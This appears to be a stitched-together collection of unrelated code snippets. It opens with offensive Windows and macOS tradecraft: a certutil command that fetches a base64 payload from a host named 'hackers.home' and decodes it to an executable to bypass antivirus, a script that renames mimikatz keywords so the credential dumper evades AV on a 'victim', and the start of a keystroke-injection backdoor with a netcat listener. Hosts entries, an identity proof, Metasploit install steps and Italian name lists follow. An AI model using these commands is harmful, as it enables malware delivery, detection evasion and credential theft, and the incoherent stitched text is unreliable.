# certutil.exe bypass av on download + base64 Decoding
# First, base64-encode the malicious file so that to an edge device it just appears as harmless text.
# Then, once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64-encoded file
# into the executable. https://www.browserling.com/tools/file-to-base64
# This is illustrated in Xavier Mertens' handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'

REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER

0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 search.msn.com
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msn.com
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.rad.msn.com

This post links my 3Box profile to my Github account! Web3 social profiles by 3Box.
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅
Create your profile today to start building social connection and trust online at https://3Box.io/

Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot

-- DISCLAIMER --
this list is a collection of surnames found on Italian territory (not necessarily "Italian")
it is generated by automatically processing one or more civil registry archives and is not checked in any way
it is therefore highly likely that it contains errors or typos
it is not, nor does it claim to be, a comprehensive list of all existing surnames
----------------
abbondanza
abu
accadia

-- DISCLAIMER --
this list is a collection of first names found on Italian territory (not necessarily "Italian")
it is generated by automatically processing one or more civil registry archives and is not checked in any way
it is therefore highly likely that it contains errors or typos
it is not, nor does it claim to be, a comprehensive list of all existing first names
----------------
abaco
abbondanza
abbondanzia

# script by JonnyBanana
# https://github.com/JonnyBanana
# this simple script asks to assign a name to a variable
# and then asks how many variables it must print on the monitor
# the output is like:
# a1 = ''
# a2 = ''
# a3 = ''
# a4 = ''
# a5 = ''